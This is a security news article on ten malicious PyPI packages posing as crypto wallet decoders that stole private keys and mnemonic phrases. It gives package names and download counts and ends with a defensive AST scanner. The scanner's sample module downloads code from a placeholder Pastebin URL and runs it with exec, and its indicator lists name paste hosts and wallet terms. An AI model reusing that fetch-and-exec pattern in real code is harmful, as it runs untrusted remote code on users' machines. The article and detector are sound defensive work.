Security researchers have discovered as many as ten malicious packages on the Python Package Index (PyPI) repository. The packages pretended to be legitimate tools for decoding and managing data from multiple popular crypto wallets but were stealing sensitive data from their users. The ten packages have over 3,500 downloads between them.
The attack targeted users of Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus, and other popular crypto wallets. The packages advertised wallet recovery and management functionality for crypto users. In reality, they stole sensitive crypto wallet data such as private keys and mnemonic phrases behind the scenes, potentially giving the attacker access to the victims’ funds.
The researchers identified that these packages were published on September 22 to the PyPI repository, a popular place for developers to quickly get extensions that enable specific functionality without writing tons of extra code. The packages distributed their source code across dependencies, separating the main package from the more harmful data-stealing components. They would activate only when specific functions were called to evade detection.
The attack chain also differs from the usual modus operandi in such cases. Instead of triggering the malicious packages automatically on installation, the packages only fetch another Python package containing the malicious code. They then lay dormant until a specific function is called, upon which they fetch malicious Python code from a Pastebin link and extract sensitive wallet information to the attacker’s server.
PyPI has taken down the malicious packages, but by then, they had amassed a total of 3,782 downloads. A full list with the number of downloads is as follows.
| Package name | Number of downloads |
|---|---|
| atomicdecoderss | 366 |
| trondecoderss | 240 |
| phantomdecoderss | 449 |
| trustdecoderss | 466 |
| exodusdecoderss | 422 |
| walletdecoderss | 232 |
| ccl-localstoragerss | 335 |
| exodushcates | 415 |
| cipherbcryptors | 450 |
| ccl_leveldbases | 407 |
To further obfuscate the code and hide their identity, the attacker did not hardcode the address of their command-and-control server in any of the packages, instead using a Pastebin link to deliver the malicious code at runtime. This made static analysis of the packages difficult and allowed the attacker to change or update the malicious payload without republishing the packages themselves.
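The behaviour described above, a package that stays dormant until a function is called and then fetches code from a paste site and executes it with no hardcoded C2 address, leaves a recognisable static footprint that a reviewer can check for before installing a dependency. The following scanner is an added example written for this article, not code from the researchers or from the packages they analysed. It parses a module with Python's `ast`, flags string constants that point at paste-site hosts or mention wallet material, flags `exec`/`eval` calls whose argument is not a literal, and records whether network fetches sit inside a function body (call-time activation, as in this campaign) or at module level (install- or import-time activation). The two sample modules, the indicator lists and the scoring thresholds are constructed for illustration and are not the real package sources.

```python
import ast

# Constructed heuristics for this example; tune for your own review process.
PASTE_HOSTS = ("pastebin.com", "paste.ee", "hastebin.com")
WALLET_TERMS = ("mnemonic", "seed phrase", "private key", "metamask",
                "exodus", "tronlink", "trust wallet")
DYNAMIC_EXEC = {"exec", "eval"}
NETWORK_CALLS = {"urllib.request.urlopen", "urlopen", "requests.get",
                 "requests.post", "httpx.get"}


def _call_name(node):
    """Return the dotted name of a call target, e.g. 'urllib.request.urlopen'."""
    func, parts = node.func, []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
    return ".".join(reversed(parts))


def scan_source(source, filename="<module>"):
    """Scan one Python module and return a list of (indicator, line) findings."""
    tree = ast.parse(source, filename=filename)
    func_ranges = [(n.lineno, n.end_lineno) for n in ast.walk(tree)
                   if isinstance(n, (ast.FunctionDef, ast.AsyncFunctionDef))]

    def in_function(lineno):
        return any(a <= lineno <= b for a, b in func_ranges)

    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            low = node.value.lower()
            if any(h in low for h in PASTE_HOSTS):
                findings.append(("paste_site_url", node.lineno))
            if any(t in low for t in WALLET_TERMS):
                findings.append(("wallet_term", node.lineno))
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            # exec/eval on anything other than a literal string: code arrives at runtime
            if name in DYNAMIC_EXEC and node.args and not isinstance(node.args[0], ast.Constant):
                findings.append(("dynamic_exec", node.lineno))
            if name in NETWORK_CALLS:
                kind = ("network_fetch_in_function" if in_function(node.lineno)
                        else "network_fetch_at_import")
                findings.append((kind, node.lineno))
    return findings


def assess(findings):
    """Combine indicators into a (score, verdict) pair; thresholds are illustrative."""
    kinds = {k for k, _ in findings}
    score = (3 * ("dynamic_exec" in kinds) + 3 * ("paste_site_url" in kinds)
             + 2 * ("network_fetch_in_function" in kinds)
             + 2 * ("network_fetch_at_import" in kinds) + 1 * ("wallet_term" in kinds))
    verdict = "high" if score >= 6 else "medium" if score >= 3 else "low"
    return score, verdict


# Constructed sample modules (not the real packages): one mirrors the article's pattern,
# the other is an ordinary helper that should not be flagged.
SUSPICIOUS = '''import urllib.request

def decode(path):
    """Decode a MetaMask vault file (constructed sample)."""
    src = urllib.request.urlopen("https://pastebin.com/raw/EXAMPLE").read()
    exec(src.decode())
    return path
'''

BENIGN = '''import json

def load(path):
    with open(path) as f:
        return json.load(f)
'''

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        findings = scan_source(src, label)
        print(label, assess(findings), findings)
```

Run it against an unpacked sdist or wheel before installation; a "high" verdict on a package whose stated purpose is wallet recovery is exactly the combination the article describes and warrants manual review of the fetched payload rather than installation.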